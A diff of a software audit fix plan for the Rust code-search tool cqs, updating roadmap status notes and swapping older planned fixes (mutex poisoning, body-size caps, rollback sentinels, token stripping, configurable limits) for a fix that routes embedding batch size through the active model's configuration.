+- [#1182](https://github.com/jamie8johnson/cqs/issues/1182) — **perfect watch mode (3-layer reconciliation).** Closes the missed-event classes (bulk git ops, WSL 9P, external writes) via `.git/hooks/post-{checkout,merge,rewrite}` + periodic full-tree fingerprint reconciliation + `cqs status --watch-fresh --wait` API. Promise: "the index is always either fresh or telling you it isn't." Supersedes the CLAUDE.md "always run `cqs index` after branch switches/merges" guidance. **Positioning lever:** *easy to index, hard to keep indexed between turns* — closing the gap promotes freshness to a top-line property alongside semantic search + call graphs. **Prior-art survey 2026-04-28** (in #1182 comment): codeindex.cc has per-query stale flags; Cursor has Merkle-tree sync; CocoIndex has fast incremental updates. None has the blocking `--wait` API + git-hook integration + "between turns" consumer-consistency-model framing. Honest pitch: "the only code search tool that lets your agent **wait** until it's fresh." Marketing claim: closing a known gap with a more complete design, not inventing a new category. **Status (2026-04-28):** Layers 1-4 shipped (#1189 freshness API, #1191 periodic reconciliation, #1193 git hooks, #1194 eval `--require-fresh`). Remaining: a WSL `/mnt/c/` integration test that exercises the full `git checkout` → freshness API stale → rebuild cycle.
+```
+
+ROADMAP.md:142:
+```markdown
+- [x] **#1182 — perfect watch mode (3-layer reconciliation).** Filed 2026-04-28. The closing-the-gap item. Three layers compose: (1) `.git/hooks/post-{checkout,merge,rewrite}` post a `reconcile` message to the daemon socket, (2) periodic full-tree fingerprint reconciliation every `CQS_WATCH_RECONCILE_SECS` (default 30s) catches what hooks + inotify miss, (3) `cqs status --watch-fresh --wait` exposes a freshness contract — eval-runner just calls `--wait` and stops caring. Promise: bounded eventual consistency, agent can either trust `fresh` or block. **Positioning differentiator. Layers 1-4 shipped #1189/#1191/#1193/#1194; remaining acceptance item is the WSL-specific integration test.**
+```
+
+### Replacement
+
+ROADMAP.md:16 — replace the trailing **Status** sentence:
+```markdown
+**Status (2026-04-28):** Layers 1-4 shipped (#1189 freshness API, #1191 periodic reconciliation, #1193 git hooks, #1194 eval `--require-fresh`); 47-file bulk-delta acceptance test landed in #1196. #1182 fully closed.
+```
+
+ROADMAP.md:142 — replace the trailing **Positioning differentiator** sentence:
+```markdown
+**Positioning differentiator. Layers 1-4 shipped #1189/#1191/#1193/#1194; 47-file bulk-delta acceptance test landed in #1196.**
+```
+
+### Verification
+
+- `grep -n "remaining acceptance item\|WSL-specific integration test" /mnt/c/Projects/cqs/ROADMAP.md` — should return zero matches.
+- `git log --oneline --all | grep "#1196"` — confirms `a240ad08` is on main.
+- No code build needed (doc-only).
+
+---
+
+## P1.9: SHL-V1.30-1 — `embed_batch_size_for` dead code; production OOMs nomic-coderank
+
+**Files:** `src/cli/pipeline/types.rs:147-207`, `src/cli/pipeline/parsing.rs:14,42`, `src/cli/enrichment.rs:73-74`, `src/cli/pipeline/mod.rs:15`, `src/cli/commands/index/build.rs:520-522`
+**Effort:** ~25 minutes
+**Why:** P2.41 in v1.30.0 triage was marked "fixed (added `embed_batch_size_for(model)`; pipeline migration follow-on)" — but the helper is still `#[allow(dead_code)]` and zero production callers exist. Both `parser_stage` (parsing.rs:42) and `enrichment_pass` (enrichment.rs:74) call legacy `embed_batch_size()` which returns 64 regardless of model. `cqs index --model nomic-coderank` (768 dim, 2048 seq) at batch=64 ships with a known OOM config on RTX 4060 8GB. Same pattern as the configurable-models disaster from MEMORY.md.
 
 ### Current code
 
 ```rust
-let signature: String = row
-    .get::<Option<String>, _>("signature")
-    .unwrap_or_default();
-let doc: Option<String> = row.get("doc");
-let content: String = row.get::<Option<String>, _>("content").unwrap_or_default();
+//   src/cli/pipeline/types.rs:178-179
+#[allow(dead_code)] // P2.41: opt-in helper; pipeline migration is a follow-on PR.
+pub(crate) fn embed_batch_size_for(model: &cqs::embedder::ModelConfig) -> usize {
 ```
 
-### Replacement
-
 ```rust
-let signature: Option<String> = row.get("signature");
-let doc: Option<String> = row.get("doc");
-let content: Option<String> = row.get("content");
+//   src/cli/pipeline/parsing.rs:14
+use super::types::{embed_batch_size, file_batch_size, ParsedBatch, RelationshipData};
 ```
 
-Update `ChunkDetail` struct to `signature: Option<String>` and `content: Option<String>`. Update `src/serve/assets/views/chunk-detail.js` to render `null` as a `<missing — DB column NULL>` placeholder instead of an empty pane.
-
-### Notes
-
-- NULL is a real signal (partial write during indexing, SIGKILL between INSERT phases) — flattening to `""` loses it.
-- The `content_preview` derivation at line 496 changes too: `content.as_deref().map(|c| c.lines().take(30)...)`.
-
----
-
-## P2.25 — Per-request span and `build_*` spans disconnected via `spawn_blocking`
-
-**Finding:** P2.25 in audit-triage.md
-**Files:** `src/serve/handlers.rs:86,111,131,160,210,236` (every `spawn_blocking` call)
-
-### Current code (representative — handlers.rs:86)
-
 ```rust
-let store = state.store.clone();
-let stats = tokio::task::spawn_blocking(move || super::data::build_stats(&store))
-    .await
-    .map_err(|e| ServeError::Internal(format!("stats join: {e}")))?
-    .map_err(ServeError::from)?;
+//   src/cli/pipeline/parsing.rs:28-42 (signature + body)
+pub(super) fn parser_stage(
+    files: Vec<PathBuf>,
+    ctx: ParserStageContext,
+    parse_tx: Sender<ParsedBatch>,
+) -> Result<()> {
+    let _span = tracing::info_span!("parser_stage").entered();
+    let ParserStageContext {
+        root,
+        force,
+        parser,
+        store,
+        parsed_count,
+        parse_errors,
+    } = ctx;
+    let batch_size = embed_batch_size();
+    let file_batch_size = file_batch_size();
 ```
 
-### Replacement
-
-Capture the calling span and re-enter inside the closure:
-
 ```rust
-use tracing::Instrument;
-let span = tracing::Span::current();
-let store = state.store.clone();
-let stats = tokio::task::spawn_blocking({
-    move || {
-        let _entered = span.enter();
-        super::data::build_stats(&store)
-    }
-})
-.await
-.map_err(|e| ServeError::Internal(format!("stats join: {e}")))?
-.map_err(ServeError::from)?;
-```
-
-Apply at all six handlers (stats / graph / chunk_detail / search / hierarchy / cluster_2d).
-
-### Notes
-
-- After this lands, drop the per-handler `tracing::info!` lines (`80, 100, 126, 149, 175, 201, 231`) — the inner `build_*` span entry plus `FmtSpan::CLOSE` will produce one structured event per request.
-- Ties to P1.20 (default subscriber drops INFO spans) — the value of this fix only materializes after that one ships.
-
----
-
-## P2.26 — TC-ADV: `LocalProvider` body-size DoS test
-
-**Finding:** P2.26 in audit-triage.md
-**Files:** `src/llm/local.rs:474-500` (production); `src/llm/local.rs:595+` (existing tests module)
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod body_size_dos_tests {
-    use super::*;
-    use httpmock::prelude::*;
-
-    #[test]
-    fn test_oversized_response_body_capped_at_5mb() {
-        let server = MockServer::start();
-        // Mock 200-OK with a 50 MB JSON body
-        let huge_body: String = "{\"choices\":[{\"message\":{\"content\":\"".to_string()
-            + &"x".repeat(50 * 1024 * 1024)
-            + "\"}}]}";
-        let _m = server.mock(|when, then| {
-            when.method(POST).path("/v1/chat/completions");
-            then.status(200).body(huge_body);
-        });
-        let cfg = make_config(&format!("{}/v1", server.base_url()), Duration::from_secs(5));
-        let provider = LocalProvider::new(&cfg).unwrap();
-        let items = vec![/* one minimal chat item */];
-        let start = std::time::Instant::now();
-        let result = provider.submit_batch_prebuilt(&items, None);
-        // Expectation: either errors out with a body-size cap, or completes in
-        // bounded memory (we cannot assert allocator behavior portably; the
-        // PR-side fix should add a 4 MiB cap via reqwest body limits).
-        assert!(
-            result.is_err() || start.elapsed() < Duration::from_secs(30),
-            "unbounded body read or excessive retry stall"
-        );
-    }
-
-    #[test]
-    fn test_4xx_with_large_body_does_not_buffer_entire_body() {
-        let server = MockServer::start();
-        let _m = server.mock(|when, then| {
-            when.method(POST).path("/v1/chat/completions");
-            then.status(400).body("x".repeat(50 * 1024 * 1024));
-        });
-        let cfg = make_config(&format!("{}/v1", server.base_url()), Duration::from_secs(5));
-        let provider = LocalProvider::new(&cfg).unwrap();
-        // body_preview should produce ≤ 256 chars; assert it doesn't OOM
-        // and returns a bounded preview.
-        let result = provider.submit_batch_prebuilt(&[/* one item */], None);
-        assert!(result.is_err());
-        // Optional: peek into the LlmError variant and assert preview length
-    }
-}
-```
-
-### Notes
-
-- Production-side fix (per RB-V1.30-1): add `Content-Length` inspection or a `take(N)` adaptor with a 4 MiB cap on summary responses, 2 KiB on `body_preview`. New env var `CQS_LOCAL_LLM_MAX_BODY_BYTES`.
-- Tests remain meaningful even if the fix is deferred — they pin current unbounded behavior so a regression after the fix is loud.
-
----
-
-## P2.27 — TC-ADV: cache accepts NaN/Inf embeddings
-
-**Finding:** P2.27 in audit-triage.md
-**Files:** `src/cache.rs:332-407` (`EmbeddingCache::write_batch`), `src/cache.rs:1677-1699` (`QueryCache::put`)
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod nan_inf_tests {
-    use super::*;
-
-    #[test]
-    fn test_write_batch_rejects_nan_embedding() {
-        let dir = tempfile::tempdir().unwrap();
-        let cache = EmbeddingCache::open(&dir.path().join("emb.db")).unwrap();
-        let bad = vec![1.0_f32, f32::NAN, 0.5, /* pad to dim */];
-        // Pad bad to expected dim
-        let dim = bad.len();
-        let entries = &[("a".repeat(64).as_str(), bad.as_slice())];
-        let written = cache.write_batch(entries, "fp1", dim).unwrap();
-        assert_eq!(written, 0, "NaN embedding must be rejected, not silently stored");
-        // Read back must return no row for that hash
-        let got = cache.read_batch(&[&"a".repeat(64)], "fp1", dim).unwrap();
-        assert!(got.is_empty(), "rejected entry must not appear in read_batch");
-    }
-
-    #[test]
-    fn test_write_batch_rejects_inf_embedding() {
-        let dir = tempfile::tempdir().unwrap();
-        let cache = EmbeddingCache::open(&dir.path().join("emb.db")).unwrap();
-        let bad = vec![f32::INFINITY; 16];
-        let entries = &[("b".repeat(64).as_str(), bad.as_slice())];
-        let written = cache.write_batch(entries, "fp1", 16).unwrap();
-        assert_eq!(written, 0);
-        let bad2 = vec![f32::NEG_INFINITY; 16];
-        let entries2 = &[("c".repeat(64).as_str(), bad2.as_slice())];
-        let written2 = cache.write_batch(entries2, "fp1", 16).unwrap();
-        assert_eq!(written2, 0);
-    }
-
-    #[test]
-    fn test_query_cache_put_rejects_non_finite() {
-        // Same shape against QueryCache::put
-    }
-}
-```
-
-### Notes
-
-- Production fix: add `if embedding.iter().any(|f| !f.is_finite()) { tracing::warn!(...); continue; }` next to the existing `embedding.len() != dim` skip block in both write paths.
-- #1105 made this worse by extending cache lifetime cross-slot.
-
----
-
-## P2.28 — TC-ADV: slot create/remove TOCTOU under concurrent operation
-
-**Finding:** P2.28 in audit-triage.md
-**Files:** `src/cli/commands/infra/slot.rs:219-266` (slot_create), `src/cli/commands/infra/slot.rs:299-350` (slot_remove); existing tests at `:391-516`
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod toctou_tests {
-    use super::*;
-
-    #[test]
-    fn test_slot_create_concurrent_same_name() {
-        let dir = tempfile::tempdir().unwrap();
-        let cqs_dir = dir.path().join(".cqs");
-        std::fs::create_dir_all(&cqs_dir).unwrap();
-        let dir1 = cqs_dir.clone();
-        let dir2 = cqs_dir.clone();
-        let h1 = std::thread::spawn(move || slot_create(&dir1, "foo", Some("bge-large"), false));
-        let h2 = std::thread::spawn(move || slot_create(&dir2, "foo", Some("e5-base"), false));
-        let r1 = h1.join().unwrap();
-        let r2 = h2.join().unwrap();
-        // Contract: at most one returns Ok; the slot ends up with a deterministic model.
-        assert!(r1.is_ok() ^ r2.is_ok() || (r1.is_ok() && r2.is_err()) || (r1.is_err() && r2.is_ok()));
-        let model = read_slot_model(&cqs_dir, "foo");
-        assert!(model == Some("bge-large".into()) || model == Some("e5-base".into()));
-    }
-
-    #[test]
-    fn test_slot_remove_during_open_index_db() {
-        // Open a Store::open_readonly_pooled on slots/foo/index.db, spawn slot_remove
-        // from another thread, assert either the open store keeps working OR the remove
-        // returns an error. Currently neither is guaranteed.
-    }
-}
-```
-
-### Notes
-
-- Production fix: `flock` on `.cqs/slots.lock` acquired by both `slot_remove` and the indexer, so the second to-arrive blocks or errors instead of corrupting.
-- Pin current behavior even if not yet fixed — any future regression away from "deterministic" must trip this test.
-
----
-
-## P2.29 — TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests
-
-**Finding:** P2.29 in audit-triage.md
-**Files:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`), `:1058+` (`drain_pending_rebuild`); existing tests at `:3979-4115`
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod rebuild_adversarial_tests {
-    use super::*;
-
-    #[test]
-    fn test_spawn_hnsw_rebuild_dim_mismatch_clears_pending() {
-        // Set up a Store with dim=768, call spawn_hnsw_rebuild with expected_dim=1024,
-        // then drain_pending_rebuild; assert pending is cleared and no dangling channel.
-    }
-
-    #[test]
-    fn test_spawn_hnsw_rebuild_thread_panic_drops_delta_loudly() {
-        // Wrap the rebuild closure with a feature-flagged panic injection point.
-        // Assert the delta is NOT silently dropped (current behavior leaks it).
-        // Production fix wraps closure in catch_unwind and replays delta on panic.
-    }
-
-    #[test]
-    fn test_spawn_hnsw_rebuild_store_open_fails_clears_pending() {
-        // Point at a non-existent index path; assert drain_pending_rebuild
-        // clears pending after the receiver sees the error.
-    }
-
-    #[test]
-    fn test_spawn_hnsw_rebuild_failure_to_spawn_disconnect_path() {
-        // Synthesize spawn failure (rlimit on threads); assert a follow-up
-        // drain_pending_rebuild clears via Disconnected (does not leak forever).
-    }
-}
-```
-
-### Notes
-
-- The "delta dropped on panic" case is a real bug per the finding, not just a coverage gap. Test must fail today.
-- Production fix: wrap the spawn closure in `std::panic::catch_unwind` and replay the delta into `state.hnsw_index` on panic.
-
----
-
-## P2.30 — TC-ADV: serve auth `strip_token_param` case/percent-encoding gaps
-
-**Finding:** P2.30 in audit-triage.md
-**Files:** `src/serve/auth.rs:101-115` (`strip_token_param`); existing tests at `:269-291`
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod auth_strip_tests {
-    use super::*;
-
-    #[test]
-    fn test_strip_token_param_case_insensitive() {
-        // ?Token=abc — currently kept in URL (capital T fails starts_with("token="))
-        // Pin the desired behavior: stripped (auth check should be case-insensitive
-        // on param name to match HTTP convention).
-        let stripped = strip_token_param("foo=1&Token=secret&bar=2");
-        assert!(!stripped.contains("Token"), "case-insensitive strip required");
-    }
-
-    #[test]
-    fn test_check_request_rejects_percent_encoded_token_key() {
-        // ?%74oken=abc (where %74 = 't')
-        // Today: literal starts_with("token=") fails, falls through to no-token, 401.
-        // Pin: either decode (preferred) or 401.
-    }
-
-    #[test]
-    fn test_strip_token_param_handles_double_ampersand() {
-        // ?token=abc&&depth=3 — the empty pair between && fails starts_with
-        // and survives into the rejoined query. Pin redirect output.
-        let stripped = strip_token_param("token=abc&&depth=3");
-        assert_eq!(stripped, "depth=3");
-    }
-
-    #[test]
-    fn test_strip_token_param_empty_value() {
-        // ?token= — pin behavior: stripped (so it doesn't sit in URL bar).
-        let stripped = strip_token_param("token=&depth=3");
-        assert_eq!(stripped, "depth=3");
-    }
-}
-```
-
-### Notes
-
-- Production fix: percent-decode the *key* via `percent_encoding::percent_decode_str` (already in dep tree) and lowercase the key. Token *value* stays exact-match for `ct_eq`.
-- Failing tests today are the SEC-7 leakage path (token survives in URL bar after redirect).
-
----
-
-## P2.31 — TC-ADV: `slot::migrate_legacy` rollback path untested
-
-**Finding:** P2.31 in audit-triage.md
-**Files:** `src/slot/mod.rs:511-593` (migration), `:561-582` (rollback loop); tests at `:850+` cover happy-path only
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod migrate_rollback_tests {
-    use super::*;
-
-    #[test]
-    fn test_migrate_rollback_on_second_file_failure() {
-        // Plant index.db and index.db-wal; make index.db-wal fail to move
-        // (e.g. open it with an exclusive flock on Linux, or remove read perms
-        // mid-test). Assert:
-        //   - rollback restores index.db to .cqs/
-        //   - slots/ is fully cleaned up
-        //   - next migration call still works (idempotent recovery)
-    }
-
-    #[test]
-    fn test_migrate_rollback_failure_leaves_loud_signal() {
-        // Make rollback ITSELF fail (chmod source dir read-only after first move).
-        // Assert migration returns Err(SlotError::Migration(...)) AND there is a
-        // single known signal (e.g. .cqs/migration_failed marker) — not silent
-        // split state.
-    }
-}
-```
-
-### Notes
-
-- Production fix (per RB-V1.30-4): write a `.cqs/migration.lock` sentinel at start, only remove on full success. Subsequent migration calls error if sentinel found.
-- EBUSY on Windows for `index.db-wal` is the realistic trigger.
-
----
-
-## P2.32 — TC-ADV: `LocalProvider` non-HTTP api_base + concurrency mis-sizing
-
-**Finding:** P2.32 in audit-triage.md
-**Files:** `src/llm/local.rs:88-121` (`LocalProvider::new`), `:128-312` (`submit_via_chat_completions`), `:153` (channel sizing)
-
-### Test skeleton
-
-```rust
-#[cfg(test)]
-mod local_provider_edge_tests {
-    use super::*;
-
-    #[test]
-    fn test_non_http_api_base_fails_fast() {
-        let cfg = make_config("file:///tmp/foo", Duration::from_secs(5));
-        let provider = LocalProvider::new(&cfg).unwrap();
-        let start = std::time::Instant::now();
-        let result = provider.submit_batch_prebuilt(&[/* one item */], None);
-        // Should error within 100ms, NOT take 7.5s for the full retry stall.
-        assert!(result.is_err());
-        assert!(start.elapsed() < Duration::from_millis(500));
-    }
-
-    #[test]
-    fn test_api_base_with_trailing_slash_works() {
-        // Pin behavior: ?token=abc with cfg api_base ending in `/`
-        // either succeeds (most servers tolerate doubled slash) or normalizes.
-    }
-
-    #[test]
-    fn test_concurrency_clamped_to_item_count_when_smaller() {
-        // For items.len()=1 and concurrency=64, only 1 worker thread
-        // should be spawned. Verify via a counter in a custom worker-spawn hook,
-        // or by enumerating thread names.
-    }
-}
-```
-
-### Notes
-
-- Production fix: bail in `LocalProvider::new` if `Url::parse(&api_base).scheme() not in {"http", "https"}`. Clamp workers via `let workers = self.concurrency.min(items.len()).max(1);` at line 166.
-
----
-
-## P2.33 — RB: Slot pointer files unbounded `read_to_string`
-
-**Finding:** P2.33 in audit-triage.md
-**Files:** `src/slot/mod.rs:207, 323`
-
-### Current code (representative — :207)
-
-```rust
-let raw = match fs::read_to_string(&path) {
-    Ok(s) => s,
-    Err(e) if e.kind() == std::io::ErrorKind::NotFound => return None,
-    Err(e) => { /* warn, return None */ }
-};
-```
-
-### Replacement
-
-```rust
-use std::io::Read;
-
-let raw = match std::fs::File::open(&path) {
-    Err(e) if e.kind() == std::io::ErrorKind::NotFound => return None,
-    Err(e) => { tracing::warn!(path = %path.display(), error = %e, "open failed"); return None; }
-    Ok(f) => {
-        let mut buf = String::new();
-        if let Err(e) = f.take(4096).read_to_string(&mut buf) {
-            tracing::warn!(path = %path.display(), error = %e, "bounded read failed; treating as missing");
-            return None;
-        }
-        buf
-    }
-};
-```
-
-Apply at both sites (`:207` `read_slot_model` and `:323` `read_active_slot`).
-
-### Notes
-
-- 4 KiB is enough for `slot.toml` (and 100× headroom on the active_slot pointer).
-- An oversize pointer file becomes "treated as missing" with a `tracing::warn!`, instead of OOMing every CLI invocation.
-
----
-
-## P2.34 — RB: `migrate_legacy` rollback leaves undetectable half-state
-
-**Finding:** P2.34 in audit-triage.md
-**Files:** `src/slot/mod.rs:511-593`, `:628-638` (`move_file`)
-
-### Replacement
-
-Write a sentinel file before the migration starts; remove on full success only. On startup, refuse if sentinel exists:
-
-```rust
-let sentinel = project_cqs_dir.join("migration.lock");
-if sentinel.exists() {
-    return Err(SlotError::Migration(format!(
-        "previous migration failed (see {}). Manually recover then `rm {}`",
-        sentinel.display(),
-        sentinel.display()
-    )));
-}
-std::fs::write(&sentinel, format!("started_at={}\n", chrono::Utc::now().to_rfc3339()))?;
-// ... do the migration (existing logic)
-// On full success only:
-std::fs::remove_file(&sentinel)?;
-```
-
-On the rollback path, leave the sentinel in place but write the failure reason to it:
-
-```rust
-// Inside rollback failure arm:
-let _ = std::fs::write(&sentinel, format!(
-    "failed_at={}\nrollback_failure={}\nrolled_back_files={:?}\n",
-    chrono::Utc::now().to_rfc3339(), e, rolled_back
-));
-```
-
-### Notes
-
-- Pairs with P2.31 test skeleton (rollback failure leaves a loud signal).
-- Half-state ambiguity is the actual robustness gap — the sentinel file disambiguates.
-
----
-
-## P2.35 — RB: `auth_attempts` / `auth_failures` mutex unwrap cascades worker poison
-
-**Finding:** P2.35 in audit-triage.md
-**Files:** `src/llm/local.rs:393-396`
-
-### Current code
-
-```rust
-if is_first_attempt && (status == StatusCode::UNAUTHORIZED || status == StatusCode::FORBIDDEN) {
-    *auth_attempts.lock().unwrap() += 1;
-    *auth_failures.lock().unwrap() += 1;
-} else if is_first_attempt {
-    *auth_attempts.lock().unwrap() += 1;
-}
-```
-
-### Replacement
-
-```rust
-if is_first_attempt && (status == StatusCode::UNAUTHORIZED || status == StatusCode::FORBIDDEN) {
-    *auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;
-    *auth_failures.lock().unwrap_or_else(|p| p.into_inner()) += 1;
-} else if is_first_attempt {
-    *auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;
-}
-```
-
-### Notes
-
-- Counters are advisory — a poisoned mutex shouldn't escalate to a panic cascade across 64 worker threads.
-- Same pattern used elsewhere in P1.9 (LocalProvider mutex poison fix).
-
----
-
-## P2.36 — RB: redirect policy disagrees between production (none) and doctor (limited(2))
-
-**Finding:** P2.36 in audit-triage.md
-**Files:** `src/llm/local.rs:99` (`Policy::none()`) vs `src/cli/commands/infra/doctor.rs:578` (`Policy::limited(2)`)
-
-### Current code
-
-```rust
-// src/llm/local.rs:97-100
-let http = Client::builder()
-    .timeout(timeout)
-    .redirect(reqwest::redirect::Policy::none())
-    .build()?;
-
-// src/cli/commands/infra/doctor.rs:576-580
-let client = match reqwest::blocking::Client::builder()
-    .timeout(std::time::Duration::from_secs(3))
-    .redirect(reqwest::redirect::Policy::limited(2))
-    .build()
-```
-
-### Replacement
-
-Align both to `Policy::limited(2)` (a same-origin HTTP→HTTPS redirect on bind-localhost is benign):
-
-```rust
-// src/llm/local.rs:99
-.redirect(reqwest::redirect::Policy::limited(2))
-```
-
-### Notes
-
-- Alternative: keep `Policy::none()` in production but log a once-per-launch warning in doctor when a redirect was followed during the probe. Less surgical but preserves strict prod stance.
-
----
-
-## P2.37 — SHL: CAGRA `itopk_size < k` on small indexes
-
-**Finding:** P2.37 in audit-triage.md
-**Files:** `src/cagra.rs:359` (computation), `:166-170` (`cagra_itopk_max_default`)
-
-### Current code
-
-```rust
-let itopk_size = (k * 2).clamp(itopk_min, itopk_max);
-```
-
-### Replacement
-
-Enforce the cuVS hard requirement `itopk_size >= k`, and degrade if the cap can't honor it:
-
-```rust
-// CONSTRAINT: cuVS CAGRA requires itopk_size >= k. Document at top of fn.
-let itopk_size = (k * 2).clamp(itopk_min, itopk_max).max(k);
-if itopk_size > itopk_max {
-    tracing::warn!(
-        k,
-        itopk_max,
-        n_vectors = self.len(),
-        "CAGRA: k exceeds itopk_max for this corpus size; falling back to HNSW"
-    );
-    return Err(CagraError::CapacityExceeded { k, itopk_max });
-}
-```
-
-Add `CagraError::CapacityExceeded { k: usize, itopk_max: usize }` variant.
-
-### Notes
-
-- The `MEMORY.md` workaround "keep eval at limit=20" only protects the eval path; production `cqs search --limit 500 --rerank` over a small subset trips this silently.
-- Caller in `src/store/search.rs` must catch `CapacityExceeded` and fall back to HNSW cleanly.
-
----
-
-## P2.38 — SHL: `nl::generate_nl` `char_budget` defaults to 512 even with 2048 max_seq_len
-
-**Finding:** P2.38 in audit-triage.md
-**Files:** `src/nl/mod.rs:222-229`
-
-### Current code
-
-```rust
-static MAX_SEQ: std::sync::OnceLock<usize> = std::sync::OnceLock::new();
-let max_seq = *MAX_SEQ.get_or_init(|| {
-    std::env::var("CQS_MAX_SEQ_LENGTH")
-        .ok()
-        .and_then(|v| v.parse().ok())
-        .unwrap_or(512)
-});
-```
-
-### Replacement
-
-Plumb the active model's `max_seq_length` through. Pass it as an argument to `generate_nl_with_template`:
-
-```rust
-pub(crate) fn generate_nl_with_template(
-    chunk: &Chunk,
-    template: NlTemplate,
-    model_max_seq_len: usize,  // NEW: from caller's ModelConfig
-) -> String {
+//   src/cli/enrichment.rs:23 (signature) and 73-74 (call site)
+pub(crate) fn enrichment_pass(store: &Store, embedder: &Embedder, quiet: bool) -> Result<usize> {
     // ...
-    // Env var becomes a fallback override only:
-    let max_seq = std::env::var("CQS_MAX_SEQ_LENGTH")
-        .ok()
-        .and_then(|v| v.parse().ok())
-        .unwrap_or(model_max_seq_len);
-    let char_budget = max_seq.saturating_mul(4).saturating_sub(200).max(400);
-    // ...
-}
+    // SHL-27: Use shared embed_batch_size() so CQS_EMBED_BATCH_SIZE env var is respected
+    let enrich_embed_batch: usize = super::pipeline::embed_batch_size();
 ```
 
-Caller in `pipeline/parsing.rs` already has `Embedder` in scope; pass `embedder.model_config().max_seq_length`.
-
-### Notes
-
-- BGE/E5/v9-200k all use 512; **nomic-coderank uses 2048** per `embedder/models.rs:366` — env var as source of truth caps it at 25% of capacity.
-- The OnceLock memoization no longer makes sense once the value depends on the caller; drop it.
-
----
-
-## P2.39 — SHL: `MAX_BATCH_SIZE = 10_000` LLM module
-
-**Finding:** P2.39 in audit-triage.md
-**Files:** `src/llm/mod.rs:192`; consumers at `src/llm/summary.rs:58,92`, `src/llm/hyde.rs:39-41`, `src/llm/doc_comments.rs:271`
-
-### Current code
-
 ```rust
-const MAX_BATCH_SIZE: usize = 10_000;
+//   src/cli/pipeline/mod.rs:15
+pub(crate) use types::embed_batch_size;
 ```
 
 ### Replacement
 
-Move to `src/limits.rs` with an env resolver:
-
 ```rust
-// src/limits.rs
-pub fn llm_max_batch_size() -> usize {
-    parse_env_usize_clamped("CQS_LLM_MAX_BATCH_SIZE", 10_000, 1, 100_000)
-}
+//   src/cli/pipeline/types.rs:178-179 (drop the dead-code suppression)
+pub(crate) fn embed_batch_size_for(model: &cqs::embedder::ModelConfig) -> usize {
 ```
 
-Replace the `const MAX_BATCH_SIZE` import with a function call at every consumer site. At CLI exit, when truncation triggered, surface a hint (current `tracing::info!` is invisible without `RUST_LOG=info`):
+Also mark the legacy entry point with a clear test-only marker:
 
 ```rust
-if remaining_chunks > 0 {
-    eprintln!("note: {} chunks remain unprocessed (cap CQS_LLM_MAX_BATCH_SIZE={}). Rerun to continue.",
-        remaining_chunks, llm_max_batch_size());
-}
-```
-
-### Notes
-
-- 100,000 hard cap honors Anthropic's actual Batches API limit.
-- HyDE and doc_comments share the same const — one env var covers both, but consider `CQS_LLM_HYDE_MAX_BATCH_SIZE` if cost characteristics diverge enough.
-
----
-
-## P2.40 — SHL: serve `ABS_MAX_GRAPH_NODES`/`ABS_MAX_CLUSTER_NODES` 50k hardcoded
-
-**Finding:** P2.40 in audit-triage.md
-**Files:** `src/serve/data.rs:17,24,505,542,571`
-
-### Current code
-
-```rust
-pub(crate) const ABS_MAX_GRAPH_NODES: usize = 50_000;
-pub(crate) const ABS_MAX_GRAPH_EDGES: usize = 500_000;
-pub(crate) const ABS_MAX_CLUSTER_NODES: usize = 50_000;
-// ... in build_chunk_detail:
-// :505 LIMIT 50 callers
-// :542 LIMIT 50 callees
-// :571 LIMIT 20 tests
-```
-
-### Replacement
-
-Move to `src/limits.rs` with env overrides + a hard ceiling:
-
-```rust
-pub fn serve_max_graph_nodes() -> usize {
-    parse_env_usize_clamped("CQS_SERVE_MAX_GRAPH_NODES", 50_000, 1, 1_000_000)
-}
-pub fn serve_max_cluster_nodes() -> usize { /* analog */ }
-pub fn serve_chunk_detail_callers_limit() -> usize {
-    parse_env_usize_clamped("CQS_SERVE_CHUNK_DETAIL_CALLERS", 50, 1, 1_000)
-}
-// ... callees, tests
-```
-
-In `build_chunk_detail`, bind the limits as `?` parameters and emit `truncated: bool` when the cap is hit. Accept `?max_callers / ?max_callees / ?max_tests` query params.
-
-### Notes
-
-- Cytoscape's render ceiling is ~5-10k nodes anyway, so the *default* 50k is too high for the UI; the *cap* 1M is for power-user queries.
-- For graph/cluster, derive the default from `chunk_count` so small projects ship the whole graph.
-
----
-
-## P2.41 — SHL: `embed_batch_size` default 64 doesn't scale with model dim/seq
-
-**Finding:** P2.41 in audit-triage.md
-**Files:** `src/cli/pipeline/types.rs:143-160`, `src/embedder/mod.rs:685-689`
-
-### Current code
-
-```rust
+//   src/cli/pipeline/types.rs:139-164 (replace existing comment + body)
+/// Legacy fixed-batch helper kept ONLY for callers without a `ModelConfig`
+/// in scope (currently: nothing in production, only the in-tree tests
+/// `pipeline::tests::test_embed_batch_size` and the parser-stage drain
+/// regression test). Production must use [`embed_batch_size_for`] which
+/// scales batch with the active model's dim & seq — at batch=64 the
+/// nomic-coderank preset (768 dim, 2048 seq) OOMs an 8 GB GPU.
+///
+/// Returns 64 with `CQS_EMBED_BATCH_SIZE` env override.
+#[cfg(test)]
 pub(crate) fn embed_batch_size() -> usize {
     match std::env::var("CQS_EMBED_BATCH_SIZE") {
         Ok(val) => match val.parse::<usize>() {
-            Ok(size) if size > 0 => size,
-            _ => 64,
+            Ok(size) if size > 0 => {
+                tracing::info!(batch_size = size, "CQS_EMBED_BATCH_SIZE override");
+                size
+            }
+            _ => {
+                tracing::warn!(
+                    value = %val,
+                    "Invalid CQS_EMBED_BATCH_SIZE, using default 64"
+                );
+                64
+            }
         },
         Err(_) => 64,
     }
 }
 ```
 
-### Replacement
+(The `#[cfg(test)]` gate is the structural guarantee — production grep for `embed_batch_size()` outside `#[cfg(test)]` blocks now fails to compile.)
 
-Make the default scale with model dim and seq_len:
+Then update `pipeline/mod.rs:15`:
 
 ```rust
-pub(crate) fn embed_batch_size_for(model: &cqs::embedder::ModelConfig) -> usize {
-    if let Ok(val) = std::env::var("CQS_EMBED_BATCH_SIZE") {
-        if let Ok(size) = val.parse::<usize>() { if size > 0 { return size; } }
-    }
-    // Target ~130 MB per forward-pass tensor:
-    //   batch * seq * dim * 4 bytes
